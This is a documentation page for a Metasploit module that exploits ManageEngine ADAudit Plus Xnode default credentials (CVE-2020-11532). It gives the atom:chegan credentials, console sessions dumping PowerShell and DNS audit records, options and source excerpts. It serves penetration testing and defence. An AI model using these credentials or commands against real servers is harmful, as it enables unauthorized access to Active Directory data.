ManageEngine ADAudit Plus Xnode Enumeration - Metasploit
This page contains detailed information about how to use the auxiliary/gather/manageengine_adaudit_plus_xnode_enum metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.
Module Overview
Name: ManageEngine ADAudit Plus Xnode Enumeration
Module: auxiliary/gather/manageengine_adaudit_plus_xnode_enum
Source code: modules/auxiliary/gather/manageengine_adaudit_plus_xnode_enum.rb
Disclosure date: -
Last modification time: 2022-08-24 16:15:11 +0000
Supported architecture(s): -
Supported platform(s): -
Target service / protocol: -
Target network port(s): 29118
List of CVEs: CVE-2020-11532
This module exploits default admin credentials for the DataEngine Xnode server in ADAudit Plus versions prior to 6.0.3 (6032) in order to dump the contents of Xnode data repositories (tables), which may contain (a limited amount of) Active Directory information including domain names, host names, usernames and SIDs. This module can also be used against patched ADAudit Plus versions if the correct credentials are provided. By default, this module dumps only the data repositories and fields (columns) specified in the configuration file (set via the CONFIG_FILE option). The configuration file is also used to add labels to the values sent by Xnode in response to a query. It is also possible to use the DUMP_ALL option to obtain all data in all known data repositories without specifying data field names. However, note that when using the DUMP_ALL option, the data won't be labeled. This module has been successfully tested against ManageEngine ADAudit Plus 6.0.3 (6031) running on Windows Server 2012 R2 and ADAudit Plus 6.0.7 (6076) running on Windows Server 2019.
Module Ranking and Traits
Module Ranking:
- normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.
Basic Usage
msf > use auxiliary/gather/manageengine_adaudit_plus_xnode_enum
msf auxiliary(manageengine_adaudit_plus_xnode_enum) > show targets
... a list of targets ...
msf auxiliary(manageengine_adaudit_plus_xnode_enum) > set TARGET target-id
msf auxiliary(manageengine_adaudit_plus_xnode_enum) > show options
... show and set options ...
msf auxiliary(manageengine_adaudit_plus_xnode_enum) > exploit
Required Options
- RHOSTS: The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
Knowledge Base
Vulnerable Application
The module exploits default admin credentials for the DataEngine Xnode server in ADAudit Plus versions prior to 6.0.3 (6032) in order to dump the contents of Xnode data repositories (tables), which may contain varying amounts of Active Directory information including domain names, host names, usernames and SIDs. The module can also be used against patched ADAudit Plus versions if the correct credentials are provided.
The module's check
method attempts to authenticate to the remote Xnode server. The default credentials are atom
:chegan
.
If the credentials are valid, the module will perform a few requests to the Xnode server to obtain information like the Xnode version.
This is mostly done as a sanity check to ensure the Xnode server is working as expected.
Next, the module will iterate over a list of known Xnode data repositories and perform several requests for each in order to: - Check if the data repository is configured on the target - Obtain the total number of records in the data repository - Obtain both the lowest and the highest value for the ID field (column). These values will be used to determine the range of possible records to be queried.
If a given data repository exists, the module uses the above information to dump the data repository contents.
The maximum number of records returned for a search query is 10. To overcome this, the module performs series of requests
using the dr:/dr_search
action, while specifying the ID values for each record.
For example, if the lowest observed ID value is 15 and the highest is 41, the module will perform three requests:
1. A request for the records with ID values 15 to 24
2. A request for the records with ID values 25 to 34
3. A request for the records with ID values 35 to 41
Empty records are ignored.
To view the raw Xnode requests and responses, enter set VERBOSE true
before running the module.
By default, the module dumps only the data repositories (tables) and fields (columns) specified in the configuration file.
The configuration file can be set via the CONFIG_FILE
option, but this is not required because
a default config file exists at data/exploits/manageengine_xnode/CVE-2020-11532/adaudit_plus_xnode_conf.yaml
that will
be used if CONFIG_FILE
is not set.
The configuration file is also used to add labels to the values sent by Xnode in response to a query.
This means that for every value in the Xnode response, the module will add the corresponding field name to the results
before writing those to a JSON file in ~/.msf4/loot
.
It is also possible to use the DUMP_ALL
option to obtain all data in all known data repositories without specifying data field names.
However, note that when using this option the data won't be labeled.
This module has been successfully tested against ManageEngine ADAudit Plus 6.0.3 (6031) running on Windows Server 2012 R2 and ADAudit Plus 6.0.7 (6076) running on Windows Server 2019.
Installation Information
Vulnerable versions of ADAudit Plus are available here. All versions from 6000 through 6031 are configured with default Xnode credentials. Note that testing against vulnerable versions from the archives will make data enumeration impossible because the free trials for those versions do not seem to allow ADAudit Plus to actually start collecting data that can then be accessed via Xnode.
However, apart from some configuration changes, Xnode functions the same way on patched versions as it does on vulnerable versions, so it is possible to test the modules against patched versions as long as the correct credentials are provided.
A free 30-day trial of the latest version of ADAudit Plus can be downloaded here. To install, just run the .exe and follow the instructions.
In order to configure a patched ManageEngine ADAudit Plus instance for testing, follow these steps:
- Open the Xnode config file at <install_dir>\apps\dataengine-xnode\conf\dataengine-xnode.conf
- Note down the username and password
- Insert the following line:
xnode.connector.accept_remote_request = true
To launch ADAudit Plus, run Command Prompt as administrator and run: <install_dir>\bin\run.bat
Verification Steps
- Start msfconsole
- Do:
use auxiliary/gather/manageengine_adaudit_plus_xnode_enum
- Do:
set RHOSTS [IP]
- Do:
run
Options
CONFIG_FILE
YAML File specifying the data repositories (tables) and fields (columns) to dump.
DUMP_ALL
Dump all data from the available data repositories (tables). If true, CONFIG_FILE will be ignored.
Scenarios
ManageEngine ADAudit Plus 6.0.3 (6031) running on Windows Server 2012 R2
msf6 auxiliary(gather/manageengine_adaudit_plus_xnode_enum) > options
Module options (auxiliary/gather/manageengine_adaudit_plus_xnode_enum):
Name Current Setting Required Description
---- --------------- -------- -----------
CONFIG_FILE /home/wynter/dev/metasploit-framework/data/exploits/manageeng no YAML file specifying the data repositories (tables) and fields (columns) to dump
ine_xnode/CVE-2020-11532/adaudit_plus_xnode_conf.yaml
DUMP_ALL false no Dump all data from the available data repositories (tables). If true, CONFIG_FILE will be ignored.
PASSWORD chegan yes Password used to authenticate to the Xnode server
RHOSTS 192.168.1.41 yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT 29118 yes The target port (TCP)
USERNAME atom yes Username used to authenticate to the Xnode server
msf6 auxiliary(gather/manageengine_adaudit_plus_xnode_enum) > run
[*] Running module against 192.168.1.41
[*] 192.168.1.41:29118 - Running automatic check ("set AutoCheck false" to disable)
[*] 192.168.1.41:29118 - Target seems to be Xnode.
[+] 192.168.1.41:29118 - The target appears to be vulnerable. Successfully authenticated to the Xnode server.
[*] 192.168.1.41:29118 - Obtained expected Xnode "de_healh" status: "GREEN".
[*] 192.168.1.41:29118 - Target is running Xnode version: "XNODE_1_0_0".
[*] 192.168.1.41:29118 - Obtained Xnode installation path: "C:\Program Files (x86)\ManageEngine\ADAudit Plus\apps\dataengine-xnode".
[*] 192.168.1.41:29118 - Data repository AdapFileAuditLog is empty.
[*] 192.168.1.41:29118 - The data repository AdapPowershellAuditLog is not available on the target.
[*] 192.168.1.41:29118 - The data repository AdapSysMonAuditLog is not available on the target.
[*] 192.168.1.41:29118 - The data repository AdapDNSAuditLog is not available on the target.
[*] 192.168.1.41:29118 - The data repository AdapADReplicationAuditLog is not available on the target.
[*] Auxiliary module execution completed
ManageEngine ADAudit Plus 6.0.7 (6076) running on Windows Server 2019 (custom password)
msf6 > use auxiliary/gather/manageengine_adaudit_plus_xnode_enum
msf6 auxiliary(gather/manageengine_adaudit_plus_xnode_enum) > set rhosts 192.168.1.25
rhosts => 192.168.1.25
msf6 auxiliary(gather/manageengine_adaudit_plus_xnode_enum) > set password custom_password
password => custom_password
msf6 auxiliary(gather/manageengine_adaudit_plus_xnode_enum) > options
Module options (auxiliary/gather/manageengine_adaudit_plus_xnode_enum):
Name Current Setting Required Description
---- --------------- -------- -----------
CONFIG_FILE /root/github/manageengine/metasploit-framework/data/exploits/manageengine_xnode/CVE-2020-11532/adaudit_plus_xn no YAML file specifying the data repositories (tables) and fields (columns) to dump
ode_conf.yaml
DUMP_ALL false no Dump all data from the available data repositories (tables). If true, CONFIG_FILE will be ignored.
PASSWORD custom_password yes Password used to authenticate to the Xnode server
RHOSTS 192.168.1.25 yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT 29118 yes The target port (TCP)
USERNAME atom yes Username used to authenticate to the Xnode server
msf6 auxiliary(gather/manageengine_adaudit_plus_xnode_enum) > run
[*] Running module against 192.168.1.25
[*] 192.168.1.25:29118 - Running automatic check ("set AutoCheck false" to disable)
[+] 192.168.1.25:29118 - The target appears to be vulnerable. Successfully authenticated to the Xnode server.
[*] 192.168.1.25:29118 - Obtained expected Xnode "de_healh" status: "GREEN".
[*] 192.168.1.25:29118 - Target is running Xnode version: "DataEngine-XNode 1.1.0 (1100)".
[*] 192.168.1.25:29118 - Obtained Xnode installation path: "C:\Program Files\ManageEngine\ADAudit Plus\apps\dataengine-xnode".
[*] 192.168.1.25:29118 - Data repository AdapFileAuditLog is empty.
[+] 192.168.1.25:29118 - Data repository AdapPowershellAuditLog contains 261 records with ID numbers between 1.0 and 303.0.
[*] 192.168.1.25:29118 - Data repository AdapSysMonAuditLog is empty.
[+] 192.168.1.25:29118 - Data repository AdapDNSAuditLog contains 722 records with ID numbers between 1.0 and 926.0.
[*] 192.168.1.25:29118 - Data repository AdapADReplicationAuditLog is empty.
[*] 192.168.1.25:29118 - Attempting to request 261 records for data repository AdapPowershellAuditLog between IDs 1 and 303. This could take a while...
[*] 192.168.1.25:29118 - Processed 25 queries (max 10 records per query) so far. The last queried record ID was 250. The max ID is 303...
[+] 192.168.1.25:29118 - Saving 261 records from the AdapPowershellAuditLog data repository to /root/.msf4/loot/20220610073738_default_192.168.1.25_xnode_powershell_099421.json
[*] 192.168.1.25:29118 - Attempting to request 722 records for data repository AdapDNSAuditLog between IDs 1 and 926. This could take a while...
[*] 192.168.1.25:29118 - Processed 25 queries (max 10 records per query) so far. The last queried record ID was 250. The max ID is 926...
[*] 192.168.1.25:29118 - Processed 50 queries (max 10 records per query) so far. The last queried record ID was 500. The max ID is 926...
[*] 192.168.1.25:29118 - Processed 75 queries (max 10 records per query) so far. The last queried record ID was 750. The max ID is 926...
[+] 192.168.1.25:29118 - Saving 722 records from the AdapDNSAuditLog data repository to /root/.msf4/loot/20220610073754_default_192.168.1.25_xnode_dnsaudit_775121.json
[*] Auxiliary module execution completed
msf6 auxiliary(gather/manageengine_adaudit_plus_xnode_enum) >
Go back to menu.
Msfconsole Usage
Here is how the gather/manageengine_adaudit_plus_xnode_enum auxiliary module looks in the msfconsole:
msf6 > use auxiliary/gather/manageengine_adaudit_plus_xnode_enum
msf6 auxiliary(gather/manageengine_adaudit_plus_xnode_enum) > show info
Name: ManageEngine ADAudit Plus Xnode Enumeration
Module: auxiliary/gather/manageengine_adaudit_plus_xnode_enum
License: Metasploit Framework License (BSD)
Rank: Normal
Provided by:
Sahil Dhar
Erik Wynter
Check supported:
Yes
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
CONFIG_FILE /opt/metasploit-framework/embedded/framewo no YAML file specifying the data repositories (tables) and fields (columns) to
rk/data/exploits/manageengine_xnode/CVE-20 dump
20-11532/adaudit_plus_xnode_conf.yaml
DUMP_ALL false no Dump all data from the available data repositories (tables). If true, CONFIG
_FILE will be ignored.
PASSWORD chegan yes Password used to authenticate to the Xnode server
RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/
Using-Metasploit
RPORT 29118 yes The target port (TCP)
USERNAME atom yes Username used to authenticate to the Xnode server
Description:
This module exploits default admin credentials for the DataEngine
Xnode server in ADAudit Plus versions prior to 6.0.3 (6032) in order
to dump the contents of Xnode data repositories (tables), which may
contain (a limited amount of) Active Directory information including
domain names, host names, usernames and SIDs. This module can also
be used against patched ADAudit Plus versions if the correct
credentials are provided. By default, this module dumps only the
data repositories and fields (columns) specified in the
configuration file (set via the CONFIG_FILE option). The
configuration file is also used to add labels to the values sent by
Xnode in response to a query. It is also possible to use the
DUMP_ALL option to obtain all data in all known data repositories
without specifying data field names. However, note that when using
the DUMP_ALL option, the data won't be labeled. This module has been
successfully tested against ManageEngine ADAudit Plus 6.0.3 (6031)
running on Windows Server 2012 R2 and ADAudit Plus 6.0.7 (6076)
running on Windows Server 2019.
References:
https://nvd.nist.gov/vuln/detail/CVE-2020-11532
https://packetstormsecurity.com/files/157609
Module Options
This is a complete list of options available in the gather/manageengine_adaudit_plus_xnode_enum auxiliary module:
msf6 auxiliary(gather/manageengine_adaudit_plus_xnode_enum) > show options
Module options (auxiliary/gather/manageengine_adaudit_plus_xnode_enum):
Name Current Setting Required Description
---- --------------- -------- -----------
CONFIG_FILE /opt/metasploit-framework/embedded/framew no YAML file specifying the data repositories (tables) and fields (columns) to
ork/data/exploits/manageengine_xnode/CVE- dump
2020-11532/adaudit_plus_xnode_conf.yaml
DUMP_ALL false no Dump all data from the available data repositories (tables). If true, CONFIG
_FILE will be ignored.
PASSWORD chegan yes Password used to authenticate to the Xnode server
RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/
Using-Metasploit
RPORT 29118 yes The target port (TCP)
USERNAME atom yes Username used to authenticate to the Xnode server
Advanced Options
Here is a complete list of advanced options supported by the gather/manageengine_adaudit_plus_xnode_enum auxiliary module:
msf6 auxiliary(gather/manageengine_adaudit_plus_xnode_enum) > show advanced
Module advanced options (auxiliary/gather/manageengine_adaudit_plus_xnode_enum):
Name Current Setting Required Description
---- --------------- -------- -----------
AutoCheck true no Run check before exploit
CHOST no The local client address
CPORT no The local client port
ConnectTimeout 10 yes Maximum number of seconds to establish a TCP connection
ForceExploit false no Override check result
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
SSL false no Negotiate SSL/TLS for outgoing connections
SSLCipher no String for SSL cipher - "DHE-RSA-AES256-SHA" or "ADH"
SSLServerNameIndication no SSL/TLS Server Name Indication (SNI)
SSLVerifyMode PEER no SSL verification method (Accepted: CLIENT_ONCE, FAIL_IF_NO_PEER_CERT, NONE, PEER)
SSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accept
ed: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
Auxiliary Actions
This is a list of all auxiliary actions that the gather/manageengine_adaudit_plus_xnode_enum module can do:
msf6 auxiliary(gather/manageengine_adaudit_plus_xnode_enum) > show actions
Auxiliary actions:
Name Description
---- -----------
Evasion Options
Here is the full list of possible evasion options supported by the gather/manageengine_adaudit_plus_xnode_enum auxiliary module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):
msf6 auxiliary(gather/manageengine_adaudit_plus_xnode_enum) > show evasion
Module evasion options:
Name Current Setting Required Description
---- --------------- -------- -----------
TCP::max_send_size 0 no Maxiumum tcp segment size. (0 = disable)
TCP::send_delay 0 no Delays inserted before every send. (0 = disable)
Go back to menu.
Error Messages
This module may fail with the following error messages:
- An unexpected error occurred whilst running this module. Please raise a bug ticket!
- Obtained unexpected Xnode "de_health" status: "<VALUE>"
- Failed to obtain the Xnode version.
- Failed to obtain the Xnode installation path.
- None of the repositories specified contained any data!
- Unable to obtain the Xnode data repositories to target from <CONFIG_FILE> because this file does not exist. Please correct your 'CONFIG_FILE' setting or set 'DUMP_ALL' to true.
- Unable to read <CONFIG_FILE>. Check if your 'CONFIG_FILE' setting is correct and make sure the file is readable and properly formatted.
- The <CONFIG_FILE> does not seem to contain any data repositories and fields to dump. Please fix your configuration or set 'DUMP_ALL' to true.
- Unable to obtain the Xnode data repositories to target from <CONFIG_FILE>. The file doesn't appear to contain valid data. Check if your 'CONFIG_DIR' setting is correct or set 'DUMP_ALL' to true.
- Unable to obtain any fields for the data repository <REPO> to query. Skipping this table. Check your config file for this module if this is unintended behavior.
- Unable to obtain the necessary fields for <REPO> from the repo_record_info_hash!
- No hits found for <REPO>!
- No non-empty records were obtained for <REPO>.
Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.
An unexpected error occurred whilst running this module. Please raise a bug ticket!
Here is a relevant code snippet related to the "An unexpected error occurred whilst running this module. Please raise a bug ticket!" error message:
84: when 1
85: return Exploit::CheckCode::Safe(res_msg)
86: when 2
87: return Exploit::CheckCode::Unknown(res_msg)
88: else
89: return Exploit::CheckCode::Unknown('An unexpected error occurred whilst running this module. Please raise a bug ticket!')
90: end
91: end
92:
93: def run
94: # check if we already have a socket, if not, create one
Obtained unexpected Xnode "de_health" status: "<VALUE>"
Here is a relevant code snippet related to the "Obtained unexpected Xnode "de_health" status: "<VALUE>"" error message:
107:
108: if res_code == 0
109: if res_health['response']['de_health'] == 'GREEN'
110: print_status('Obtained expected Xnode "de_health" status: "GREEN".')
111: else
112: print_warning("Obtained unexpected Xnode \"de_health\" status: \"#{res_health['response']['de_health']}\"")
113: end
114: end
115:
116: # get the Xnode info
117: info_warning_message = 'Received unexpected response while trying to obtain the Xnode version and installation path via the "xnode_info" action. Enumeration may not work.'
Failed to obtain the Xnode version.
Here is a relevant code snippet related to the "Failed to obtain the Xnode version." error message:
119:
120: if res_code == 0
121: if res_info['response'].keys.include?('xnode_version')
122: print_status("Target is running Xnode version: \"#{res_info['response']['xnode_version']}\".")
123: else
124: print_warning('Failed to obtain the Xnode version.')
125: end
126:
127: if res_info['response'].keys.include?('xnode_installation_path')
128: print_status("Obtained Xnode installation path: \"#{res_info['response']['xnode_installation_path']}\".")
129: else
Failed to obtain the Xnode installation path.
Here is a relevant code snippet related to the "Failed to obtain the Xnode installation path." error message:
125: end
126:
127: if res_info['response'].keys.include?('xnode_installation_path')
128: print_status("Obtained Xnode installation path: \"#{res_info['response']['xnode_installation_path']}\".")
129: else
130: print_warning('Failed to obtain the Xnode installation path.')
131: end
132: end
133:
134: # obtain the total number of records and the min and max record ID numbers for each repo, which is necessary to enumerate the records
135: repo_record_info_hash = {}
None of the repositories specified contained any data!
Here is a relevant code snippet related to the "None of the repositories specified contained any data!" error message:
169: }
170: end
171:
172: # check if we found any repositories that contained any data
173: if repo_record_info_hash.empty?
174: print_error('None of the repositories specified contained any data!')
175: return
176: end
177:
178: if dump_all
179: data_to_dump = ad_audit_plus_data_repos
Unable to obtain the Xnode data repositories to target from <CONFIG_FILE> because this file does not exist. Please correct your 'CONFIG_FILE' setting or set 'DUMP_ALL' to true.
Here is a relevant code snippet related to the "Unable to obtain the Xnode data repositories to target from <CONFIG_FILE> because this file does not exist. Please correct your 'CONFIG_FILE' setting or set 'DUMP_ALL' to true." error message:
180: else
181: data_to_dump = grab_config(config_file)
182:
183: case data_to_dump
184: when config_status::CONFIG_FILE_DOES_NOT_EXIST
185: fail_with(Failure::BadConfig, "Unable to obtain the Xnode data repositories to target from #{config_file} because this file does not exist. Please correct your 'CONFIG_FILE' setting or set 'DUMP_ALL' to true.")
186: when config_status::CANNOT_READ_CONFIG_FILE
187: fail_with(Failure::BadConfig, "Unable to read #{config_file}. Check if your 'CONFIG_FILE' setting is correct and make sure the file is readable and properly formatted.")
188: when config_status::DATA_TO_DUMP_EMPTY
189: fail_with(Failure::BadConfig, "The #{config_file} does not seem to contain any data repositories and fields to dump. Please fix your configuration or set 'DUMP_ALL' to true.")
190: when config_status::DATA_TO_DUMP_WRONG_FORMAT
Unable to read <CONFIG_FILE>. Check if your 'CONFIG_FILE' setting is correct and make sure the file is readable and properly formatted.
Here is a relevant code snippet related to the "Unable to read <CONFIG_FILE>. Check if your 'CONFIG_FILE' setting is correct and make sure the file is readable and properly formatted." error message:
182:
183: case data_to_dump
184: when config_status::CONFIG_FILE_DOES_NOT_EXIST
185: fail_with(Failure::BadConfig, "Unable to obtain the Xnode data repositories to target from #{config_file} because this file does not exist. Please correct your 'CONFIG_FILE' setting or set 'DUMP_ALL' to true.")
186: when config_status::CANNOT_READ_CONFIG_FILE
187: fail_with(Failure::BadConfig, "Unable to read #{config_file}. Check if your 'CONFIG_FILE' setting is correct and make sure the file is readable and properly formatted.")
188: when config_status::DATA_TO_DUMP_EMPTY
189: fail_with(Failure::BadConfig, "The #{config_file} does not seem to contain any data repositories and fields to dump. Please fix your configuration or set 'DUMP_ALL' to true.")
190: when config_status::DATA_TO_DUMP_WRONG_FORMAT
191: fail_with(Failure::BadConfig, "Unable to obtain the Xnode data repositories to target from #{config_file}. The file doesn't appear to contain valid data. Check if your 'CONFIG_DIR' setting is correct or set 'DUMP_ALL' to true.")
192: end
The <CONFIG_FILE> does not seem to contain any data repositories and fields to dump. Please fix your configuration or set 'DUMP_ALL' to true.
Here is a relevant code snippet related to the "The <CONFIG_FILE> does not seem to contain any data repositories and fields to dump. Please fix your configuration or set 'DUMP_ALL' to true." error message:
184: when config_status::CONFIG_FILE_DOES_NOT_EXIST
185: fail_with(Failure::BadConfig, "Unable to obtain the Xnode data repositories to target from #{config_file} because this file does not exist. Please correct your 'CONFIG_FILE' setting or set 'DUMP_ALL' to true.")
186: when config_status::CANNOT_READ_CONFIG_FILE
187: fail_with(Failure::BadConfig, "Unable to read #{config_file}. Check if your 'CONFIG_FILE' setting is correct and make sure the file is readable and properly formatted.")
188: when config_status::DATA_TO_DUMP_EMPTY
189: fail_with(Failure::BadConfig, "The #{config_file} does not seem to contain any data repositories and fields to dump. Please fix your configuration or set 'DUMP_ALL' to true.")
190: when config_status::DATA_TO_DUMP_WRONG_FORMAT
191: fail_with(Failure::BadConfig, "Unable to obtain the Xnode data repositories to target from #{config_file}. The file doesn't appear to contain valid data. Check if your 'CONFIG_DIR' setting is correct or set 'DUMP_ALL' to true.")
192: end
193: end
194:
Unable to obtain the Xnode data repositories to target from <CONFIG_FILE>. The file doesn't appear to contain valid data. Check if your 'CONFIG_DIR' setting is correct or set 'DUMP_ALL' to true.
Here is a relevant code snippet related to the "Unable to obtain the Xnode data repositories to target from <CONFIG_FILE>. The file doesn't appear to contain valid data. Check if your 'CONFIG_DIR' setting is correct or set 'DUMP_ALL' to true." error message:
186: when config_status::CANNOT_READ_CONFIG_FILE
187: fail_with(Failure::BadConfig, "Unable to read #{config_file}. Check if your 'CONFIG_FILE' setting is correct and make sure the file is readable and properly formatted.")
188: when config_status::DATA_TO_DUMP_EMPTY
189: fail_with(Failure::BadConfig, "The #{config_file} does not seem to contain any data repositories and fields to dump. Please fix your configuration or set 'DUMP_ALL' to true.")
190: when config_status::DATA_TO_DUMP_WRONG_FORMAT
191: fail_with(Failure::BadConfig, "Unable to obtain the Xnode data repositories to target from #{config_file}. The file doesn't appear to contain valid data. Check if your 'CONFIG_DIR' setting is correct or set 'DUMP_ALL' to true.")
192: end
193: end
194:
195: # try and dump the database tables Xnode has access to
196: data_to_dump.each do |repo, fields|
Unable to obtain any fields for the data repository <REPO> to query. Skipping this table. Check your config file for this module if this is unintended behavior.
Here is a relevant code snippet related to the "Unable to obtain any fields for the data repository <REPO> to query. Skipping this table. Check your config file for this module if this is unintended behavior." error message:
193: end
194:
195: # try and dump the database tables Xnode has access to
196: data_to_dump.each do |repo, fields|
197: if fields.blank? && !dump_all
198: print_error("Unable to obtain any fields for the data repository #{repo} to query. Skipping this table. Check your config file for this module if this is unintended behavior.")
199: next
200: end
201:
202: # check if we actually found any records for the repo
203: next unless repo_record_info_hash.include?(repo)
Unable to obtain the necessary fields for <REPO> from the repo_record_info_hash!
Here is a relevant code snippet related to the "Unable to obtain the necessary fields for <REPO> from the repo_record_info_hash!" error message:
205: total_hits = repo_record_info_hash[repo]['total_hits']
206: id_range_lower = repo_record_info_hash[repo]['aggr_min']
207: max_id = repo_record_info_hash[repo]['aggr_max']
208:
209: if total_hits.nil? || id_range_lower.nil? || max_id.nil?
210: print_error("Unable to obtain the necessary fields for #{repo} from the repo_record_info_hash!")
211: next
212: end
213:
214: if total_hits == 0
215: print_error("No hits found for #{repo}!")
No hits found for <REPO>!
Here is a relevant code snippet related to the "No hits found for <REPO>!" error message:
210: print_error("Unable to obtain the necessary fields for #{repo} from the repo_record_info_hash!")
211: next
212: end
213:
214: if total_hits == 0
215: print_error("No hits found for #{repo}!")
216: next
217: end
218:
219: id_range_upper = id_range_lower + 9
220: query_ct = 0
No non-empty records were obtained for <REPO>.
Here is a relevant code snippet related to the "No non-empty records were obtained for <REPO>." error message:
247: end
248: end
249: end
250:
251: if results.empty?
252: print_error("No non-empty records were obtained for #{repo}.")
253: next
254: end
255:
256: # shorten the data repository name (if necessary) so that it can be used as part of the eventual output file name
257: outfile_part = "xnode_#{repo.gsub('Adap', '').gsub('AuditLog', 'audit').gsub('ADReplication', 'ADRepl').downcase}"
Go back to menu.
Related Pull Requests
- #16982 Merged Pull Request: Update Dell iDRAC login scanner to work with v8 and v9
- #17032 Merged Pull Request: Add module for pfSense pfBlockNG unauth RCE as root - CVE-2022-31814
- #17116 Merged Pull Request: Adding CVE-2022-22947 Spring Cloud Gateway RCE Exploit
- #17092 Merged Pull Request: netlm_downgrade: Cleanup and support non-Meterpreter sessions
- #16987 Merged Pull Request: guard for all possible RubySMBError conditions
- #17123 Merged Pull Request: netrc and fetchmailrc docs
- #17057 Merged Pull Request: Msf::Post::Windows::ExtAPI: Remove load_extapi method
References
See Also
Check also the following modules related to this module:
- auxiliary/gather/manageengine_datasecurity_plus_xnode_enum
- auxiliary/admin/http/manageengine_dir_listing
- auxiliary/admin/http/manageengine_file_download
- auxiliary/admin/http/manageengine_pmp_privesc
- auxiliary/scanner/http/manageengine_desktop_central_login
- auxiliary/scanner/http/manageengine_deviceexpert_traversal
- auxiliary/scanner/http/manageengine_deviceexpert_user_creds
- auxiliary/scanner/http/manageengine_securitymanager_traversal
- exploit/multi/http/manageengine_auth_upload
- exploit/multi/http/manageengine_sd_uploader
- exploit/multi/http/manageengine_search_sqli
- exploit/windows/http/manageengine_adaudit_plus_cve_2022_28219
- exploit/windows/http/manageengine_adselfservice_plus_cve_2021_40539
- exploit/windows/http/manageengine_adselfservice_plus_cve_2022_28810
- exploit/windows/http/manageengine_adshacluster_rce
- exploit/windows/http/manageengine_appmanager_exec
- exploit/windows/http/manageengine_apps_mngr
- exploit/windows/http/manageengine_connectionid_write
- exploit/windows/http/manageengine_servicedesk_plus_cve_2021_44077
- exploit/windows/misc/manageengine_eventlog_analyzer_rce
- post/linux/gather/manageengine_password_manager_creds
- auxiliary/gather/enum_dns
- auxiliary/gather/hp_enum_perfd
- auxiliary/gather/ibm_bigfix_sites_packages_enum
- auxiliary/gather/ibm_sametime_enumerate_users
- auxiliary/gather/kerberos_enumusers
- auxiliary/gather/mongodb_js_inject_collection_enum
- auxiliary/gather/office365userenum
- auxiliary/dos/http/webkitplus
- auxiliary/scanner/http/servicedesk_plus_traversal
- auxiliary/scanner/http/support_center_plus_directory_traversal
- auxiliary/scanner/oracle/isqlplus_login
- auxiliary/scanner/oracle/isqlplus_sidbrute
- exploit/unix/ssh/arista_tacplus_shell
- exploit/windows/fileformat/zahir_enterprise_plus_csv
Authors
- Sahil Dhar
- Erik Wynter
Version
This page has been produced using Metasploit Framework version 6.2.26-dev. For more modules, visit the Metasploit Module Library.
Go back to menu.